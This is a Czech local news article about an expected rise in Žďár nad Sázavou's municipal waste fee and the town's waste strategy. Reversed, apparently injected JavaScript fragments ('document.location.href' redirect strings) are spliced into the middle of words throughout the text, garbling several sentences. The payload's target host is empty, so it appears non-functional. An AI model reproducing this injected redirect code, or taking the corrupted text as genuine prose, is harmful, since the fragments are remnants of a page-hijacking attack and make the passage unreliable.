Rainbow page separator

Poplatek za komunální odpad bude vyšší, zatím se neví o kolik

Pondělí, 18. října 2021

Žďár nad Sázavou / Mezi 660 až 720 korunami by se měl v příštím roce pohybovat poplatek za svoz a zpracování komunálního odpadu. Jeho přesná výše dosud nebyla stanovena. V současné době obyvatelé Žďáru platí 580 korun za osobu a rok, nicméně vzhledem k novému zákonu o odpadech, který začal platit na začátku roku a přinesl s sebou s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupající náklady pro obce, se s navýšením poplatku počítalo. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to si nechalo vypracovat strategii odpadového hospodářství skládající se z analytické a návrhové části, přičemž konkrétní návrhová část má na stůl zastupitelů přijít začátkem lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu.
Snahou je co nejvíce eliminovat samotný vznik komunálního odpadu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to především posílením a zefektivněním jeho třídění, například i důslednější separací bioodpadu z domácností. Ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou k úspoře má být i přednostní zajištění energetického využití odpadu, tedy jeho spalování, s čímž už Žďár začal prostřednictvím brněnské spalovny SAKO a zatím má nasmlouváno tisíc tun ročně. Také je předpoklad zachování čtrnáctidenního intervalu svozu netříděněného odpadu z ulic s rodinnými domy, neboť se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to podle města po finanční stránce osvědčilo. V budoucnu se počítá rovněž se zřízením jednoho či více menších sběrných dvorů, které by posloužily k dotříďování především objemných odpadů. Dalším krokem bude činnost nedávno založeného spolku obcí Mikroregion Žďársko, jenž vznikl prioritně k řešení společné odpadové politiky regionu po roce 2030, kdy bude definitivně ukončeno skládkování. Od společného postupu si obce slibují zejména silnější vyjednávací pozici.